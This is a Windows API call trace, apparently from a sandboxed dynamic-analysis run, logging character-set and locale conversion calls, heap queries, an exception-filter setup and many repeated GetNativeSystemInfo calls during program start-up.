	[0122.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0122.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-hÄ¿äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0122.695] GetLastError () returned 0x0
	[0122.695] SetLastError (dwErrCode=0x0) 
	[0122.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0122.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0122.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0122.695] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0122.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-hÄ¿äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0122.701] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4050f2) returned 0x0
	[0122.702] RtlSizeHeap (HeapHandle=0x7ab0000, Flags=0x0, MemoryPointer=0x7ac35c0) returned 0x80
	[0122.702] RtlSizeHeap (HeapHandle=0x7ab0000, Flags=0x0, MemoryPointer=0x7ac35c0) returned 0x80
	[0122.702] RtlSizeHeap (HeapHandle=0x7ab0000, Flags=0x0, MemoryPointer=0x7ac35c0) returned 0x80
	[0122.702] RtlSizeHeap (HeapHandle=0x7ab0000, Flags=0x0, MemoryPointer=0x7ac35c0) returned 0x80
	[0122.702] lstrlenW (lpString="") returned 0
	[0122.702] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.702] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.703] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.704] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
